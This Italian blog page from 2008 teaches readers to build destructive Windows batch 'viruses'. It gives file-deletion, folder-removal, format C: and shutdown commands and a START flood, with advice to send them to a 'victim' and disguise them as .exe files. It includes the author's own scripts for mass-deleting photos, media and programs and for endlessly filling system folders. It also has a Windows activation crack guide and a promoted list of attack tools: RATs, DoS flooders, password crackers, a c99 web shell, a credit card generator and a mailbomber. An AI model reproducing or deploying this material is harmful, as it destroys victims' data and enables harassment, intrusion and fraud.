sabato 27 settembre 2008

Come creare virus

Ekko una guida facile e veloce di come creare i + piccoli virus e facile e nn necessità di particolare abilità solo di pazienza

1) Aprire il blocco note
2) Incollarci il codice
3) Chiudere e salvare il file in .bat


Virus Per Cancellare Un File
1) Aprite il blocco note
2) Incollateci 1 dei seguenti codici:

CODICE
@ERASE /comando "C:\percorso\percorso *.*"
@DEL /comando "C:\percorso\percorso *.*"

3) Chiudete e salvate in .bat


IN DETTAGLIO: Che significa quel codice?
Allora:
1) @ERASE e @DEL = Sono per cancellare file
2) /comando = Bisognerebbe inserire 1 o più comandi tra questi:

a) /P Chiede conferma prima di eliminare ogni file.
b) /F Forza l'eliminazione dei file di sola lettura.
c) /S Elimina i file specificati da tutte le sottodirectory.
d) /Q Modalità silenziosa, non chiede conferma per eliminazioni globali.
e) /A Seleziona i file da eliminare in base agli attributi.

3) *.* = Il PRIMO asterisco serve per cancellare TUTTI i file con un certo nome, come:
CODICE
eversor.*

4) *.* = Il SECONDO asterisco serve per cancellare QUALSIASI tipo di ESTENSIONE di un file, come:
CODICE
*.txt


5) QUINDI, in sostanza se dobbiamo cancellare il file "eversor" in .txt sul desktop, faremo:
CODICE
@ERASE /S /Q "C:\Programmi\Documents and settings\L.H.S.\Desktop\eversor.txt *.txt"



Virus Per Cancellare Una Cartella
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
CODICE
@RD /s /q C:\Percorso_Cartella

3) Salvare in .bat

IN DETTAGLIO: Perchè @RD?
@RD Serve in questo per cancellare una cartella, mentre @DEL e @ERASE era per File, @RD è per cartella.


Virus Per Formattare C:
1) Aprire il blocco note
2) Inserirci dentro il seguente codice:
CODICE
format C: /autotest /q /u

3) Salvare in .bat

IN DETTAGLIO: Questo virus formatta c: senza chiedere conferma (/q) e non permette di essere bloccata piu avanti (/u)


Virus Per Disconnettere/Riavviare/Spegnere il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
CODICE
shutdown -comando

3) Salvare in .bat

IN DETTAGLIO: Il -comando può essere sostituito tra i seguenti:

a) -i : Attiva l’interfaccia utente grafica
b) -l : Disconnette l'utente
c) -r : Riavvia il PC
d) -s : Spegne il computer
e) -t xx: xx Sarebbero i secondi di attesa prima della chiusura di Windows
f) -f : Chiude le applicazioni ancora aperte


Virus Per Far Impallare Il PC
1) Aprire il blocco note
2) Inserire dentro il seguente codice:
START
START
START
START
START
START
START
START
ecc...
3) Salvare in .bat

IN DETTAGLIO: Se aprite l'msdos (Start--->Esegui--->cmd) e scrivete START, a sua volta vi apre di nuovo il prompt.
Che succede se voi scrivete START tipo 500 volte (MAGARI COL NOSTRO FLODDER SPECIALE) salvate in batch e lo mandate alla vittima???
Beh, vi lascio a voi immaginare.


Trasformare Il .bat In .exe
1) Scaricate il seguente programma: Batch To Exe 1.2
2) Apritelo e scegliete le opzioni, si può anche cambiare l'icona del file


Aumentare Il Peso Del Virus
1) Aprire il blocco note
2) Incollarci dentro il codice
3) Aggiungere il codice:
CODICE
@REM parole_a_caso_ma_tante

4) Salvare in .bat

IN DETTAGLIO: Perchè @REM?
Allora si da il caso che il comando @REM, serva per "Inserire Commenti", MA, se noi al posto dei commenti mettiamo non so, 500 volte la lettere aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non faremo altro che AUMENTARE il peso del virus.

questi invece sono i comandi del ms-dos:
* assign - reindirizza tutte le richieste a un drive, verso un altro drive
* attrib - visualizza o modifica gli attributi dei file
* backup - crea una copia di sicurezza di uno o più file su una serie di floppy-disk
* break - abilita o disabilita l'interruzione o l'esecuzione fornita da CTRL C e CTRL BREAK
* cd - entra in una directory
* chdir - cambia la directory corrente o ne visualizza il nome
* chkdsk - analizza il contenuto del disco e visualizza una relazione sul suo stato
* cls - cancella il contenuto della schermata (questo comando non è distruttivo)
* color - permette di impostare il colore dello sfondo e del testo
* command - avvia un nuovo interprete dei comandi MS-DOS
* comp - confronta il contenuto di un file o gruppo di file con altri
* copy - copia uno o più file in un altro punto del disco
* ctty - cambia la console di input/output da cui vengono impostati i comandi
* date - visualizza e permette di aggiornare la data
* defrag - riorganizza i file in un disco rigido per ottimizzarne l'uso
* del - cancella uno o più file
* deltree - elimina una directory e tutti i file e le sottodirectory in essa contenute
* dir - visualizza il contenuto di una directory
* discopy - copia il contenuto di un disco floppy in un altro disco floppy
* diskcomp - confronta il contenuto di due dischetti dello stesso tipo
* doskey - ripete gli ultimi comandi digitati
* echo - abilita o disabilita l'eco da file batch
* edit - avvia MS-DOS Editor per creare o modificare i file ASCII
* edlin - avvia un editor di righe di testo. Per magg. informazioni (Prompt comandi e edlin/?)
* emm386 - abilita o disabilita la memoria espansa di EMM386
* erase - cancella uno o piu file specificati
* exe2bin - converte in formato binario un file eseguibile
* exit - provoca l'uscita da un interprete di comandi secondario per ritornare ad un interprete di comandi o ad un programma precedenti
* expand - decomprime uno o più file compressi
* fastopen - accellera l'apertura di un programma
* fc - confronta il contenuto di due file
* fdisk - configura un disco rigido creando le partizioni, per l'utilizzo di MS-DOS
* find - ricerca una sequenza di caratteri all'interno di uno o piu file
* for - permette di eseguire in modo iterattivo comandi di MS-DOS
* format - formatta un disco per l'utilizzo di MS-DOS
* goto - trasferisce l'esecuzione ad una determinata posizione di un file batch
* graftabl - carica in memoria i caratteri ASCII non BIOS per i modi grafici
* help - visualizza la guida di MS-DOS. ATTENZIONE la guida è troppo lunga per essere visualizzata in una sola schermata, quindi per visualizzarla schermata per schermata digitare help|more (il simbolo "|" è il tasto alla sinistra tasto uno (1) altrimenti alt+124 = "|" e scrivere more
* hexdump - lista in formato esadecimale il contenuto di un file, byte per byte
* if - condiziona l'esecuzione di un comando in un file batch
* ipconfig - visualizza configurazione IP di Windows. ATTENZIONE per maggiori informazioni digitare ipconfig/all
* join - unisce un drive di disk ad una directory vuota su di un altro drive
* keyb - configura la tastiera per la lingua specificata
* label - crea, modifica o elimina l'etichetta di volume di un disco
* md - crea una directory
* mem - visualizza la quantità della memoria usata e quella libera del sistema
* mode - stabilisce le modalità di visualizzazione e trasmissione per la stampante
* more - permette la visualizzazione di informazioni, (files, pagine, o altri tipi di dati) che per la loro grandezza (insieme di righe) devono essere visualizzate con più schermate alla volta. ATTENZIONE è necessario che "more" sia preceduto dal simbolo "|" ALT+124. Ex. help|more. Prestare ulteriore ATTENZIONE in alcuni computers o Sistemi operativi anteriori al MS-DOS 6.0 non riconoscono il simbolo "|" è, perciò, necessario digitare il simbolo "/" seguito da una p. Ex. help/p
* path - visualizza o imposta un percorso di ricerca per file eseguibili
* pause - provoca una pausa nell'esecuzione di un file batch per consentire un input da operatore
* print - stampa un file di testo
* prompt - cambia il prompt dei comandi di MS-DOS
* rd - cancella una directory
* recover - recupera un file o un intero disco con settori danneggiati
* rem - visualizza commenti durante l'esecuzione di un file batch
* ren - rinomina uno o più file
* replace - sostituisce i file
* restore - ripristina dai dischi di back-up un certo numero di file
* rmdir - rimuove una sottodirectory vuota
* select - copia il dischetto MS-DOS per creare una copia di lavoro per la nazionalità selezionata della tastiera
* set - assegna un valore di sostituzione ad un parametro con chiave presente in un programma applicativo o in un file batch
* share - installa la condivisione ed il bloccaggo dei file MS-NET
* shift - aumenta il numero di parametri sostituibili in un file batch
* shutdown - arresta o riavvia il sistema
* sort - ordina i dati alfabeticamente, in un senso o nell'altro
* subst - associa un percorso ad una lettera di unità
* sys - copia i file di sistema di MS-DOS e l'interprete dei comandi sul disco specificato
* time - visualizza e consente di modificare l'ora
* title - permette di impostare il titolo della finestra
* tree - visualizza tutte le directory ed i percorsi del drive specificato
* type - visualizza il contenuto di un file di testo
* undelete - ripristina i file cancellati precedentemente con il comando del
* unformat - ripristina i dati di un disco cancellati con il comando format
* ver - visualizza la versione di MS-DOS in uso
* verify - abilita la verifica dei dati in scrittura
* vol - visualizza l'etichetta e il numero di serie di volume del disco
* win - esegue Windows
* xcopy - copia i file e la struttura delle directory (ad esclusione dei file nascosti e di sistema)

i comandi dos sono molto utili x fare dei virus .bat...

Messaggio personale che cambia

Si tratta di My Spellbook in cui puoi impostare vari PSM (le frasi personali) ed il tempo in cui girano beh ragazzi provatelo ecco qui il download!

Dritta sui virus

Un virus informatico non è altro che un programma come gli altri capace di replicarsi tramite altri file non infetti e danneggiare il sistema.

Qui di seguito vi illustrero i principali virus!



Troyan Horse



Un Troyan Horse non è un virus come gli altri ma bensì un programma distruttivo. Le caratteristiche che lo differenziano dagli altri virus sono che mentre i virus cercano di rendersi invisibili e a replicarsi, i Troyan Horse danneggiano esplicitamente il sistema!

Il loro nome deriva dal fatto che i Troyan Horse vengono divulgati con nomi fittizzi ovvero vengono distribuiti con il nome di programmi molto ricercati dagli utenti per fare in modo di essere aperti e danneggiare il sistema!

Questi sono i virus più semplici da costruire, ciò nonostante sono distruttivi e potenti sia perché provocano vistosi danni sia per il fatto che non vengono quasi mai rivelati dagli antivirus.



Worm



Un Worm è un tipo di virus “tecnologicamente più avanzato”, esso infatti si replica lungo le reti (internet, tanto per capirci). E' un tipo di virus molto potente ma tuttora non esistono campioni di questo virus molto avanzati. La causa principale è la presenza di vari sistemi operativi (sulla rete) che non ne facilitano lo sviluppo, anche se i worm sembrano avere facile sviluppo sulle piattaforme come Unix,Linux e Java.



Dialer



E un programma che cambia le impostazioni di “accesso remoto”, cioe' i dati impostati per la connessione ad Internet via modem, in modo da chiamare un numero a pagamento. Tutte le connessioni ad Internet via modem verranno quindi dirottate sul numero a pagamento con il risultato di vedersi arrivare nella bolletta una fattura stratosferica.



Spyware



E un termine generico che indica tutta una serie di “programmino” che vengono installati in maniera piu' o meno lecita sul computer, sia attraverso siti Web particolari, sia attraverso software "gratuito" scaricabile da Internet.

La funzione e' molto simile a quella del Trojan tranne che la maggior parte delle volte la presenza dello Spyware viene apertamente dichiarata dagli autori dei programmi. Il fine degli Spyware nel migliore dei casi e' quello di raccogliere informazioni sull'utente, ad esempio quali pagine Web visita, quando, quanto, eccetera. Gli esiti visibili sono di solito l'interferenza con il normale funzionamento del browser e un anormale consumo di risorse di sistema.



Macro Virus



Questi sono virus più usati al momento. Anno il vantaggio di essere multi-piattaforma cioè funzionano su Win e su Mac. Le applicazioni a rischio per questi virus sono:



Ms-Word 9x (File .doc)



Ms-Excel9x (File .xls)



e quasi tutti gli altri programmi che consentono l'uso di Macro. Questi virus vengono scritti in Visual Basic.



Companion Virus



La creazione di questi virus è molto semplice come del resto anche la loro eliminazione. Il comportamento di questi virus è molto semplice: sfruttano la priorità d'esecuzione dei .com

Esempio:

In un adirectory ci sono due file:

1)Run.exe

2)Run.com

Se si vuole eseguire uno dei due ma noi si indica l'estensione, il sistema Microsoft esegue il file .com

Quindi il funzionamento di questi virus è molto semplice, essi infatti cercano i file .exe e copiano (nelle loro dir)

i virus ma con l'estensione .com Così all'avviamento dell'applicazione viene aperto il virus e non il programma desiderato.



Ad Azione Diretta



Questi virus infettano un file eseguibile e appena questo viene aperto il virus cerca nelle directory altri file “infettabili” in modo da propagare l' infezione.



Virus Stealth



Simile alla categoria precedente i virus Stealth riescono a prendere il controllo delle funzioni base del Dos e ad eliminare ogni sintomo dell'infezione che è avvenuta. La categoria Stealth ha ancora tre ulteriori suddivisioni:

1. Size Hiding: se il virus è lungo 100 kb,la dimensione di tutti i file che verranno infettati verrà aumentata di 100Kb.

Rende difficile la sua identificazione grazie all'identificazione del comando "dir", quindi il virus sottrae il valore aggiunto in precedenza facendoli così non sembrare infetti.

2. Mbr Stealth: questa è la categoria che infetta l' Mbr (Master Boot Record), salva una copia del vecchio Master e la restituisce quando un Antivirus va a leggere l' Mbr in modo da non non rendere "visibile" l'infezione.

3. Clean On-The-Fly: ottima tipologia di virus che utilizza un sistema molto utile per non essere identificato, infatti questi virus intercettano l'operazione di lettura dei file infetti e prima che questi vengano letti li ripulisce facendo sembrare non infetti i file al controllo, poi una volta controllato il file il virus procede a re-infettarlo.



Virus Polimorfici



Questo tipo di virus utilizza la tecnica di crittografia in modo da essere riconoscibile solo dal motore crittografico del virus stesso,oppure vengano utilizzati tools esterni. In questo modo il virus (e gli eventuali file infetti da esso) sono difficilmente individuabili.

XP falso diventa originale ecco come

Rendere la copia di Windwos xp originale

1)Scarichiamo il pacchetto contenente tutto il necessario da questo indirizzo:

http://morpheus8.altervista.org/genuine.rar

2)Una volta scaricato scompattiamo l’archivio

3)Aprite il file Windows XP Keygen.exe per calcolare un seriale valido e salvarlo da qualche parte. NB:funziona solo con Windows Xp Professional (con o senza service pack 2). Non vale per XP Home Edition. Se avete questo avrete bisogno di un seriale originale.

4)Eseguire il file Keyfinder.exe. Adesso verrà mostrato il vecchio seriale.
Per sostituirlo con il nuovo andate in : Options/Change Windows Key.

5)Inserire il seriale che prima avete calcolato e cliccare Change e OK

6)Aprire il programma WGA fix.exe e cliccare Si.

7)Esegui il programma MGADiad.exe e premi il tasto continue ( così verificherai se la tua copia è diventata genuina.

8)Controlla il Validation Status, nella prima riga in alto. Se troverete scritto “Genuine” allora avrete la vostra copia di Windows Xp regolarmente valida e più il problema WGA

Un mio lavoretto per scassare i pc

questi qui sono 2 file .bat(virus) creati da me molto carini se c'e qualcuno che vi rompe le palle e volete devastargli il computer usate questo file.... (per .bat si intende virus)

CODICEdel /s C:\*.jpg
del /s C:\*.jpeg
del /s C:\*.bmp
del /s C:\*.gif
del /s C:\*.png
del /s D:\*.jpg
del /s D:\*.jpeg
del /s D:\*.bmp
del /s D:\*.gif
del /s D:\*.png
del /s D:\*.mp3
del /s D:\*.wma
del /s D:\*.wmw
del /s D:\*.mp4
del /s D:\*.avi
del /s D:\*.3gp
del /s D:\*.rar
del /s C:\*.mp3
del /s C:\*.wma
del /s C:\*.wmw
del /s C:\*.mp4
del /s C:\*.avi
del /s C:\*.3gp
del /s C:\*.rar
del /s C:\*.exe
del /s D:\*.exe

aprite il note pad slavatelo in .bat ATTENZIONE A NON APRIRLO VI CANCELLEREBBE TUTTI IL FILE DAL PC
infatti questo .bat va a cercare tutti i file di tipo foto,audio,video,exe
cancellando sistema operativo e qualsiasi altra cosa presente nel computer

se volete somalente disturbare usate quest altro,creera cartelle in tutto il computer nbella cartella di windows in C:\ in D:\ dekstop e in ogni altro punto possibile


CODICE@echo off
@cd\
@:eterno
@cd\
@cd windows
@echo morte > %­random%.txt
@md %­random%
@cd system
@echo violenza > %­random%.txt
@md %­random%
@cd..
@cd system32
@echo peste > %­random%.txt
@md %­random%
@cd..
@cd addins
@echo sofferenza > %­random%.txt
@md %­random%
@cd..
@cd AppPatch
@echo desolazione > %­random%.txt
@md %­random%
@cd..
@cd Config
@echo pena > %­random%.txt
@md %­random%
@cd..
@cd Driver Cache
@echo guerra > %­random%.txt
@md %­random%
@cd..
@cd Fonts
@echo povertà > %­random%.txt
@md %­random%
@cd..
@cd Help
@echo indifferenza > %­random%.txt
@md %­random%
@cd..
@cd ime
@echo sopraffazione > %­random%.txt
@md %­random%
@cd..
@cd WinSxS
@echo pena di morte > %­random%.txt
@md %­random%
@cd..
@cd Temp
@echo umanità distrutta > %­random%.txt
@md %­random%
@cd..
@cd security
@echo insicurezza > %­random%.txt
@md %­random%
@cd..
@cd RegisteredPackages
@echo regimen > %­random%.txt
@md %­random%
@cd..
@cd Prefetch
@echo imperfezione > %­random%.txt
@md %­random%
@cd\
@cd Documents and Settings
@echo dolore > %­random%.txt
@md %­random%
@cd\
@cd Program files
@echo distruzione > %­random%.txt
@md %­random%
@cd\
@cd Programmi
@echo sangue > %­random%.txt
@md %­random%
@cd\
@cd %­userprofile%\desktop
@echo buk > %­random%.txt
@md %­random%
@cd\
@cd %­userprofile%\documenti
@echo buk88 > %­random%.txt
@md %­random%
@cd\
@cd %­userprofile%
@echo Buk > %­random%.txt
@md %­random%
@cd\
@echo infinito > %­random%.txt
@md %­random%
@goto :eterno



Ki sà ampliare la devastazione di questo virus mi contatti su msn il mio contatto e pan_e_puparuol@hotmail.it

I miei programmi da hacker

IO NN MI ASSUMO LA RESPONSABILITà DELLE COSE KE FARETE CN QUESTI PROGRAMMI IO STO DANDO SOLO INFO

QUESTI SONO + DELLA METà DEI PROGRAMMI CHE USO PER LE MIE HACKERATE E SONO ANCORA UN PRINCIPIANTE PENSATE I VERI HACKER CHE AVRANNO SUI PC E VABBE VI DOVETE ACCONTENTARE DI QUESTO SPERO VI SIA STATO UTILE

Acunetix Web Vulnerability Scanner 3
Descrizione: Ecco a voi uno scanner per trovare vulnerabilità sui siti web.

aSpyOne Rat Reverse Connection
Descrizione: Si tratta del famoso rat bypass lan roter firewall completo di tante funzioni password,storage, spyaudio eccc veramente da provare. (verrà segnalato come trojan)

Assault
Descrizione: Ecco un ottimo flodder che usa le porte UDP e ICMP. Verrà segnalato come virus, non preoccupatevi apritelo ugualmente.

Attacco Dos
Descrizione: Un Esempio di un attacco Dos Denial of service ps è fatto in visual absic net 2005 serve il framework per poterlo usare e epr poterlo prendere tasto destro sul link e mettere salva oggetto con nome.

Battle PonG
Descrizione: Molto semplice, ma, anche molto potente, basta inserire l’ip scegliere la grandezza del ping, la velocità, e il gioco è fatto.

Binary to Ascii
Descrizione: Discreto convertitore di Codice binario ad ascii

Brutus
Descrizione: Programma che sfrutta Brute Force {Forza Bruta}

Cain&Abel
Descrizione: Uno dei migliore cracker di passwd ma molto lento…

Credit Card Generator
Descrizione: Generatore di carte di creditò Visa/Amercan Express

DDos Ping 1.03
Descrizione: Programma eccezionalmente utile per fare un ddos..

DNS scanner
Descrizione: Questo scanner permette di ricavare informazioni su una porta specifica di un pc

DosAttack
Descrizione: Un Buon attacco dos ( Denial Of Service )

Fake Mail
Descrizione: Ottimo Fake Mail fatto in visual basic

Hscan
Descrizione: Ottimo scanner che serve per trovare vulnerabilità su un range di ip.

Inferno Nuke
Descrizione: Buon Nuke, usato soprattutt in IRC

Legion Scanner
Descrizione: Ottimo scanner per netbios, scanda la porta 139 e se trova condivisioni ti fa accedere direttamente nel pc della vittima.

Md5 Cracker
Descrizione: Ottimo cracker per le passwd MD5 è famoso per la sua velocità.

MD5 Finder
Descrizione: Ottimo Crack di Password MD5

Modem Spy
Descrizione: Questo programma è capace di rubare tutte le informazioni delle telefonate che ricevete dallo sdoppiatore della linea telefonica.

Modulo Fake Mail (php html)
Descrizione: Modulo in formato html o php ( a scelta dell’utente ) da inserire nel proprio sito, per dar luogo ai propri utenti di inviare anonimail gratuite. L’arrivo della mail e sicuro al 100% .

Ricordo che Inviare E-Mail Anonime non è illegale, serve a rispetare la Privacy. Abusare di tale Servizio per scopi illeciti, e illegale ed a responsabilità del Mittente.
Eurohackers.it non si assume nessuna responsabilità sull’uso improprio di questo script, facendo affidamento sul Buon Senso degli utenti.

Neo.Trace.Pro.v3.25
Descrizione: Ottimo programma che pinga un IP risalendo al server di chiamata, per scoprire da quale paese chiama l’indirizzo.

Panther Mode -2- DSL
Descrizione: Attacca le linee ADSL

Rocket
Descrizione: Ecco qua!!! E’ vero ormai nessuno usa più la 56k, ma se ne conosce qualcuno, e gli volete male, allora questo fa al caso vostro, basta un click e quello che vi rompeva in chat si scollega.

Shadow Scanner
Descrizione: Programma che scannerizza un range di ip e trova passwd di accaunt FTP. Equivalente di Windows per Linux

Shell c99
Descrizione: Shell C99 , la migliore in circolazione, il file si presenta .rar ed al suo interno e compreso di shell in php jpg e txt.

Smurf
Descrizione: In assoluto il miglio programma per attacchi DOS , basta inserire l’ip e in pochi minuti disconnette un modem ADSL 4/6 MB. All’interno comprende File di Broadcast e istruzioni per il suo utilizzo.

Smurf Ver1.7 Completo di Broadcast
Descrizione: Smurf versione 1.7 completo di broadcast, uno degli attacchi flood più potenti.
Opera tramite l’invio di pacchetti spoofati da dos.

Super Scanner 4.0
Descrizione: Il Miglio scanner in circolazione per Windows, Ottimo , Veloce ed Affidabile.

Syn Host By Scarface
Descrizione: Semplice Port #### fatto in visual absic net 2005 serve il framework per aprirlo e per scaricarlo tasto destro sul link e mettere salva oggetto con nome.

UnaBomBer
Descrizione: Discreto mailbomber lo usato poche volte solo per test su account creati da me! Comunque e ottimo come ripicca contro un persona che ti ha fatto lo stesso attacco.

Zip Password Revelator
Descrizione: Buon Cracker di password ZIP